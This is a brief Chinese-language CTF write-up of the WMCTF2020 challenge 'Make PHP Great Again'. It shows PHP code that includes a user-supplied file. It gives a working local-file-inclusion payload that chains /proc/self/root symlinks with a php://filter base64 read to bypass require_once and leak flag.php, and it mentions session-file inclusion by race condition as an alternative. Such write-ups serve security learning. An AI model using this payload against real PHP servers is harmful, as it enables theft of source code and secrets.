[PHP知识库][WMCTF2020]Make PHP Great Again

预期

<?php
highlight_file(__FILE__);
require_once 'flag.php';
if(isset($_GET['file'])) {
  require_once $_GET['file'];
}

在php中，require_once在调用时php会检查该文件是否已经被包含过，如果是则不会再次包含，也不会包含当前文件（就是这题index.php不会包含index.php和flag.php）

PHP最新版的小Trick， require_once包含的软链接层数较多时once的hash匹配会直接失效造成重复包含
参考
/proc/self/root/是指向/的符号链接
payload:
?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php

非预期 session文件包含，条件竞争